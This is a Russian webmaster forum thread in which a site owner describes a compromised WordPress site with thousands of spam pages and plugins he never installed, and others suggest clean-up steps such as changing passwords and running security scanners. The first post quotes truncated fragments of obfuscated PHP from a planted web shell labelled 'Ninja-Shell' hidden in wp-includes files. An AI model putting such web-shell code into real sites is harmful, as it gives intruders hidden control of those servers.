- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
+16000 страниц, которых нет в админки. +Xml карт сайт множество.
ai-bolit находит скрипт, удалил. Он опять находит, но скрипта уже там нет.
Xml со скрина как-то подтянулись в Вебмастер. Может с плагина "Лента Yandex Turbo"
Второй день копаю.
Вчера у сайта белый экран был. Даже дебаг Wp ошибку не показывал. Бекап накатил, пока вроде признаков нет, но это только пока)))
wp-includes/assets/php-compat/admin.php [x] …"];$GLOBALS["get"]=$funct["_GET"];$GLOBALS["server"]=$funct["_SERVER"];$GLOBALS["files"]=$funct["_FILES"];?><html><head> <title>{Ninja-Shell}</title><meta charset="UTF-8"><meta name="robots" content="NOINDEX,NOFOLLOW"><link rel="icon" href= wp-includes/blocks/footnotes/about.php T["g"])){$GNJ[38]($GNJ[9]);header("Content-Type: application/octet-stream");header("Content-Transfer-Encoding: Binary"); header("Content-Length: ".$GNJ[34](uhex($_GET["g"])));header("Content-disposition: attachment;filename=\"".uhex($_GET["Второй день копаю.
Информация очень интересная. Копай дальше. В чём конкретный вопрос к форуму, кроме этой занимательной истории?
Бекап накатил, пока вроде признаков нет, но это только пока
Естественно. Жди повторного взлома. Только не спеши снова бэкап накатывать - может быть, ещё не всё испортил.
Xml со скрина как-то подтянулись в Вебмастер
C robots.txt подтянулось походу.
Wordfence стоит?
+16000 страниц, которых нет в админки. +Xml карт сайт множество.
ai-bolit находит скрипт, удалил. Он опять находит, но скрипта уже там нет.
Xml со скрина как-то подтянулись в Вебмастер. Может с плагина "Лента Yandex Turbo"
Второй день копаю.
Вчера у сайта белый экран был. Даже дебаг Wp ошибку не показывал. Бекап накатил, пока вроде признаков нет, но это только пока)))
а версии Wordpress, темы и плагинов стояли все новые?
Пошли плагины ставятся, которых не ставил 😀 +2500 страниц в Вебмастере. Ищем дырку.
Вот поэтому я не люблю wp, ненадежный движок. Недавно решил дать шанс wp, установил, добавил статьи, плагины проверял новые для функциональности. Потом смотрю, а карт сайты сотни с десятки тысяч страниц на японском. Бэкап делал, но толку 0. Оказалось, что плагин какой-то сам установился левый вместе с нужным мне. Все плагины в поиске с админки устаавливал, думал там все проверено, ничего не скачивал с сайтов.
Полностью удалял сайт с сервера, заново устанавливал, но плагины добавил только самые важные. Сейчас все ок. Кстати в гугл searchconsole в настройках пользователя появился левый тип со статусом владельца, удалил его. Он подтвертил файлом и успел добавить много карт сайта и пару сотен проиндексировались. Поищи может серч консоль тоже. Хорошо, что ссылки однотипные с одним названием вида /spam/fffdd.html, быстро удалил из поиска. Темы лучше брать проверенные и плагины тоже как можно меньше.
Пошли плагины ставятся, которых не ставил 😀 +2500 страниц в Вебмастере. Ищем дырку.
Попробуй https://patchstack.com/ - на blackhatworld когда то посоветовали, сказали хорошо уязвимости ищет, фришный тариф есть
Пошли плагины ставятся, которых не ставил 😀 +2500 страниц в Вебмастере. Ищем дырку.
пробовали такое?
восстановить старый бэкап, где точно все ок... удалить все плаги, поменять пароль на базе и админке, на фтп / сфтп
это вроде базовые вещи, если плаг фтп доступ получил то любой откат не поможет, пока все пароли не обновишь